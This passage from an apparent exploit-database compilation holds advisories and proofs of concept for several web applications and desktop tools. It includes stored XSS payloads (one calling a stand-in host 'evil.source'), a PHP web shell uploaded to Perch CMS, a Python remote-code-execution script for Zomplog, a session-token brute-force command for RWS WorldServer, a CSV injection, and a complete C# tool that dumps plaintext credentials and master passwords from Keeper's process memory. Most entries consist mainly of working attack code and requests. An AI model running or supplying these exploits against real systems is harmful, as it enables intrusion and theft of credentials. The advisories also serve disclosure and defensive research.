Information) 10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion) 10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.) 10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols 10.7 Attackers are able to perform man in the middle attacks from the local computer system 11.0 Successful reproduce of the security vulnerability! Reference(s): Pictures - 1.png (Terminal A) - 2.png (Terminal B) - 3.png (Escape) - 4.png (Awareness) Solution - Fix & Patch: ======================= The security vulnerabilities can be patched by following steps: 1. Disable the content menu to extend 2. Disable the context menu 3. Disable web-search 4. Disable to mark text inputs & texts 5. Disallow to open not white listed websites 6. Disable to download files 7. Restrict the web-browser access 8. Disallow the file browser 9. Disable the browser debug modus 10. Reconfigure the local firewall to allow and disallow connections 11. Change the access permission to prevent exfiltration Security Risk: ============== The security risk of the vulnerability in the local booking and payment terminal system is considered high. The issue can be easily exploited by local attackers with simple interaction via the touch display. Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse it for further simple or more complex attack scenarios. Credits & Authors: ================== Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther
  17. Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2285 Release Date: ============= 2023-07-19 Vulnerability Laboratory ID (VL-ID): ==================================== 2285 Common Vulnerability Scoring System: ==================================== 5.8 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. (Copy of the Homepage:https://codecanyon.net/user/codepaul ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application. Affected Product(s): ==================== CodePaul Product: PaulPrinting (2018) - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-08-25: Researcher Notification & Coordination (Security Researcher) 2022-08-26: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code. After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins in the backend (listing). The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in the backend (listing). Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] /printing/register [+] /account/delivery Vulnerable Input(s): [+] First name [+] Last name [+] Address [+] City [+] State Vulnerable Parameter(s): [+] firstname [+] lastname [+] address [+] city [+] state Affected Module(s): [+] Frontend Settings (./printing/account/setting) [+] Frontend Delivery Address (./printing/account/delivery) [+] Backend User Preview Listing [+] Backend Delivery Address Contact Review Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open your browser and start a http session tamper 2. Register in the application by login click to register 3. Inject to the marked vulnerable input fields your test payload 4. Save the entry by submit via post method 5. Login to the account and preview the settings Note: Administrators in the backend have the same wrong validated context that executes on preview of users 6. The script code executes on preview of the profile - settings 7. Successful reproduce of the first vulnerability! 8. Followup by opening the Delivery address module 9. Add a contact and add in the same vulnerable marked input fields your test payload Note: T he script code executes on each review of the address in the backend or user frontend 10. Successful reproduce of the second vulnerability! Exploitation: Payload "<iframe src=evil.source onload(alert(document.cookie)> "<iframe src=evil.source onload(alert(document.domain)> --- PoC Session Logs (POST) --- https://paulprinting.localhost:8000/printing/account/setting Host: paulprinting.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 357 Origin:https://paulprinting.localhost:8000 Connection: keep-alive Referer:https://paulprinting.localhost:8000/printing/account/setting Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd; POST: title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>> &lastname=b"<iframe src=evil.source onload(alert(document.cookie)>> &address=c"<iframe src=evil.source onload(alert(document.cookie)>> &city=d"<iframe src=evil.source onload(alert(document.cookie)>> &state=e"<iframe src=evil.source onload(alert(document.cookie)>> &zipcode=2342&country=BS&phone=23523515235235&save=Save - POST: HTTP/3.0 302 Found content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 location:https://paulprinting.localhost:8000/printing/account/setting?save=1 - https://paulprinting.localhost:8000/printing/account/setting?save=1 Host: paulprinting.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer:https://paulprinting.localhost:8000/printing/account/setting Connection: keep-alive Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd; - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 Vulnerable Source: Your Account - Settings <div class="form-group row"> <label class="col-sm-4 col-form-label">First name</label> <div class="col-sm-8"> <input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <label class="col-sm-4 col-form-label">Last name</label> <div class="col-sm-8"> <input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">Address</label> <div class="col-sm-8"> <input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">City</label> <div class="col-sm-8"> <input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">State</label> <div class="col-sm-8"> <input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> Vulnerable Source: Deliery Contact (Address) <table class="table"> <thead> <tr> <th>Contact</th> <th>Address</th> <th>City</th> <th>State</th> <th>Country</th> <th></th> </tr> </thead> <tbody><tr> <td>a"<iframe src=evil.source onload(alert(document.cookie)></td> <td>b"<iframe src=evil.source onload(alert(document.cookie)></td> <td>c"<iframe src=evil.source onload(alert(document.cookie)></td> <td>d"<iframe src=evil.source onload(alert(document.cookie)></td> <td></td> <td class="text-right"> <a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>| <a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a> </td></tr></tbody> </table> Security Risk: ============== The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
  18. Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration Session tokens in RWS WorldServer have a low entropy and can be enumerated, leading to unauthorised access to user sessions. Details ======= Product: WorldServer Affected Versions: 11.7.3 and earlier versions Fixed Version: 11.8.0 Vulnerability Type: Session Token Enumeration Security Risk: high Vendor URL: https://www.rws.com/localization/products/additional-solutions/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001 Advisory Status: published CVE: CVE-2023-38357 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357 Introduction ============ "WorldServer offers a flexible, enterprise-class translation management system that automates translation tasks and greatly reduces the cost of supporting large volumes of local language content." (from the vendor's homepage) More Details ============ WorldServer associates user sessions with numerical tokens, which always are positive values below 2^31. The SOAP action "loginWithToken" allows for a high amount of parallel attempts to check if a token is valid. During analysis, many assigned tokens were found to be in the 7-digit range of values. An attacker is therefore able to enumerate user accounts in only a few hours. Proof of Concept ================ In the following an example "loginWithToken" request is shown: ----------------------------------------------------------------------- POST /ws/services/WSContext HTTP/1.1 Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 501 Host: www.example.com Connection: close User-Agent: agent <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org"> <soapenv:Header/> <soapenv:Body> <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <token xsi:type="xsd:string">FUZZ</token> </com:loginWithToken> </soapenv:Body> </soapenv:Envelope> ----------------------------------------------------------------------- It can be saved as file "login-soap.req" and be used as a request template for the command-line HTTP enumerator monsoon [1] to achieve many parallel requests: ----------------------------------------------------------------------- $ monsoon fuzz --threads 100 \ --template-file login-soap.req \ --range 1-2147483647 \ --hide-pattern "InvalidSessionException" \ 'https://www.example.com' Target URL: https://www.example.com/ status header body value extract 500 191 560 5829099 500 191 556 6229259 200 191 3702 7545136 500 191 556 9054984 [...] processed 12000000 HTTP requests in 2h38m38s 4 of 12000000 requests shown, 1225 req/s ----------------------------------------------------------------------- The --range parameter reflects the possible value range of 2^31 and for each value an HTTP request is sent to the WorldServer SOAP API where the FUZZ marker in the request template is replaced with the respective value. Also responses are hidden which contain "InvalidSessionException" as these sessions are invalid. Responses will yield a status code of 200 if an administrative session token is found. For an unprivileged user session, status code 500 is returned. Workaround ========== Lower the rate at which requests can be issued, for example with a frontend proxy. Fix === According to the vendor, upgrading to versions above 11.8.0 resolves the vulnerability. Security Risk ============= Attackers can efficiently enumerate session tokens. In a penetration test, it was possible to get access to multiple user accounts, including administrative accounts using this method in under three hours. Additionally, by using such an administrative account it seems likely to be possible to execute arbitrary code on the underlying server by customising the REST API [2]. Thus, the vulnerability poses a high risk. Timeline ======== 2023-03-27 Vulnerability identified 2023-03-30 Customer approved disclosure to vendor 2023-04-03 Requested security contact from vendor 2023-04-06 Vendor responded with security contact 2023-04-14 Advisory sent to vendor 2023-04-18 Vendor confirms vulnerability and states that it was already known and fixed in version 11.8.0. 2023-07-03 Customer confirms update to fixed version 2023-07-05 CVE ID requested 2023-07-15 CVE ID assigned 2023-07-19 Advisory released References ========== [1] https://github.com/RedTeamPentesting/monsoon [2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
  19. Exploit Title: Perch v3.2 - Remote Code Execution (RCE) Application: Perch Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://grabaperch.com/ Software Link: https://grabaperch.com/download Date of found: 21.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/) 3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/) 4. upload poc.phar file poc.phar file contents : <?php $a=$_GET['code']; echo system($a);?> 5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd poc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1 Host: localhost Content-Length: 1071 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9 Connection: close ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="resourceTitle" test ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image"; filename="poc.phar" Content-Type: application/octet-stream <?php $a=$_GET['code']; echo system($a);?> ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image_field" 1 ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image_assetID" ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="resourceBucket" admin ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="tags" test ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="btnsubmit" Submit ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="formaction" edit ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="token" 5494af3e8dbe5ac399ca7f12219cfe82 ------WebKitFormBoundaryYGoerZn09hHSjd4Z--
  20. Exploit Title: Perch v3.2 - Stored XSS Application: Perch Cms Version: v3.2 Bugs: XSS Technology: PHP Vendor URL: https://grabaperch.com/ Software Link: https://grabaperch.com/download Date of found: 21.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account 2. go to http://localhost/perch_v3.2/perch/core/settings/ 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)
  21. # Exploit Title: RosarioSIS 10.8.4 - CSV Injection # Google Dork:NA # Exploit Author: Ranjeet Jaiswal# # Vendor Homepage: https://www.rosariosis.org/ # Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip # Affected Version: 10.8.4 # Category: WebApps # Tested on: Windows 10 # # # 1. Vendor Description: # # RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical personnel. However, it also adds many components not typically found in Student Information Systems. # # 2. Technical Description: # # A CSV Injection (also known as Formula Injection) vulnerability in the RosarioSIS web application with version 10.8.4 allows malicious users to execute malicious payload in csv/xls and redirect authorized user to malicious website. # # 3. Proof Of Concept: 3.1. Proof of Concept for CSV injection. # #Step to reproduce. Step1:Login in to RosarioSIS 10.8.4 Step2:Go to Periods page Step3:Add CSV injection redirection payload such as "=HYPERLINK("https://www.google.com","imp")"in the Title field Step4:click on Save button to save data. Step5:Go to export tab and export the data Step6:When user open download Periods.xls file.You will see redirection hyperlink. Step7:When user click on link ,User will be redirected to Attacker or malicious website. # 4. Solution: Upgrade to latest release of RosarioSIS.
  22. #Exploit Title: zomplog 3.9 - Remote Code Execution (RCE) #Application: zomplog #Version: v3.9 #Bugs: RCE #Technology: PHP #Vendor URL: http://zomp.nl/zomplog/ #Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip #Date of found: 22.07.2023 #Author: Mirabbas Ağalarov #Tested on: Linux import requests #inputs username=input('username: ') password=input('password: ') #urls login_url="http://localhost/zimplitcms/zimplit.php?action=login" payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js" rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php" poc_url="http://localhost/zimplitcms/poc.php" #login session = requests.Session() login_data=f"lang=en&username={username}&password={password}&submit=Start!" headers={ 'Cookie' : 'ZsessionLang=en', 'Content-Type' : 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36' } login_req=session.post(login_url,headers=headers,data=login_data) if login_req.status_code == 200: print('Login OK') else: print('Login promlem.') exit() #payload payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520" pheaders={ 'Content-Type' : 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36' } payload_req=session.post(payload_url,headers=pheaders,data=payload_data) #rename rename_req=session.get(rename_url) #poc poc_req=session.get(poc_url) print(poc_req.text) #youtube poc video - https://youtu.be/nn7hieGyCFs
  23. # Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping # Google Dork: NA # Date: 22-07-2023 # Exploit Author: H4rk3nz0 # Vendor Homepage: https://www.keepersecurity.com/en_GB/ # Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html # Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4 # Tested on: Windows # CVE : CVE-2023-36266 using System; using System.Management; using System.Diagnostics; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Text.RegularExpressions; using System.Collections.Generic; // Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory // This can persist after logout if the user has not explicitly enabled the option to 'clear process memory' // As a result of this one can extract credentials & master password from a victim after achieving low priv access // This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app. // Github: https://github.com/H4rk3nz0/Peeper static class Program { // To make sure we are targetting the right child process - check command line public static string GetCommandLine(this Process process) { if (process is null || process.Id < 1) { return ""; } string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}"; using (var searcher = new ManagementObjectSearcher(query)) using (var collection = searcher.Get()) { var managementObject = collection.OfType<ManagementObject>().FirstOrDefault(); return managementObject != null ? (string)managementObject["CommandLine"] : ""; } } //Extract plain text credential JSON strings (regex inelegant but fast) public static void extract_credentials(string text) { int index = text.IndexOf("{\"title\":\""); int eindex = text.IndexOf("}"); while (index >= 0) { try { int endIndex = Math.Min(index + eindex, text.Length); Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))"); string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); int match_cut = match.IndexOf("} "); if (match_cut != -1 ) { match = match.Substring(0, match_cut + "} ".Length).TrimEnd(); if (!stringsList.Contains(match) && match.Length > 20) { Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n"); stringsList.Add(match); } } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20) { Console.WriteLine("->Credential Record Found : " + match + "\n"); stringsList.Add(match.TrimEnd()); } index = text.IndexOf("{\"title\":\"", index + 1); eindex = text.IndexOf("}", eindex + 1); } catch { return; } } } // extract account/email containing JSON string public static void extract_account(string text) { int index = text.IndexOf("{\"expiry\""); int eindex = text.IndexOf("}"); while (index >= 0) { try { int endIndex = Math.Min(index + eindex, text.Length); Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)"); string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); if ((match.Length > 2)) { Console.WriteLine("->Account Record Found : " + match + "\n"); return; } index = text.IndexOf("{\"expiry\"", index + 1); eindex = text.IndexOf("}", eindex + 1); } catch { return; } } } // Master password not available with SSO based logins but worth looking for. // Disregard other data key entries that seem to match: _not_master_key_example public static void extract_master(string text) { int index = text.IndexOf("data_key"); int eindex = index + 64; while (index >= 0) { try { int endIndex = Math.Min(index + eindex, text.Length); Regex reg = new Regex("(data_key[ -~]+)"); var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})"); if (match_one.Replace("data_key", "").Length > 5) { if (!clean.IsMatch(match_one.Replace("data_key", ""))) { Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n"); } } index = text.IndexOf("data_key", index + 1); eindex = index + 64; } catch { return; } } } // Store extracted strings and comapre public static List<string> stringsList = new List<string>(); // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8 // Performs OpenProcess to get handle with necessary query permissions static void Main(string[] args) { foreach (var process in Process.GetProcessesByName("keeperpasswordmanager")) { string commandline = GetCommandLine(process); if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7")) { Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString()); Console.WriteLine("->Searching...\n"); IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id); IntPtr address = new IntPtr(0x10000000000); MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION(); while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0) { if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000) { byte[] buffer = new byte[(int)memInfo.RegionSize]; if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0) { string text = Encoding.ASCII.GetString(buffer); extract_credentials(text); extract_master(text); extract_account(text); } } address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64()); } CloseHandle(processHandle); } } } [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr hObject); [DllImport("ntdll.dll")] public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead); [DllImport("kernel32.dll", SetLastError = true)] public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength); [StructLayout(LayoutKind.Sequential)] public struct MEMORY_BASIC_INFORMATION { public IntPtr BaseAddress; public IntPtr AllocationBase; public uint AllocationProtect; public IntPtr RegionSize; public uint State; public uint Protect; public uint Type; } }
  24. Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS) Application: Zomplog Version: v3.9 Bugs: XSS Technology: PHP Vendor URL: http://zomp.nl/zomplog/ Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip Date of found: 22.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account 2. Add new page 3. Set as <img src=x onerror=alert(4)> 4. Go to menu Poc request: POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1 Host: localhost Content-Length: 11 sec-ch-ua: Accept: */* Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open Connection: close empty=empty
  25. # Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS) # Date: 07/2023 # Exploit Author: Andrey Stoykov # Tested on: Ubuntu 20.04 # Blog: http://msecureltd.blogspot.com XSS #1: Steps to Reproduce: 1. Browse to Bookings 2. Select All Bookings 3. Edit booking and select Promo Code 4. Enter payload TEST"><script>alert(`XSS`)</script> // HTTP POST request POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] [...] edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1 [...] // HTTP response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 205 [...] // HTTP GET request to Bookings page GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] // HTTP response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 33590 [...] [...] <label class="control-label" for="promo_code">Promo code:</label> <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder=""> </div> [...] Unrestricted File Upload #1: // SVG file contents <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(`XSS`); </script> </svg> Steps to Reproduce: 1. Browse My Account 2. Image Browse -> Upload 3. Then right click on image 4. Select Open Image in New Tab // HTTP POST request POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] [...] -----------------------------13831219578609189241212424546 Content-Disposition: form-data; name="img"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(`XSS`); </script> </svg> [...] // HTTP response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 190 [...]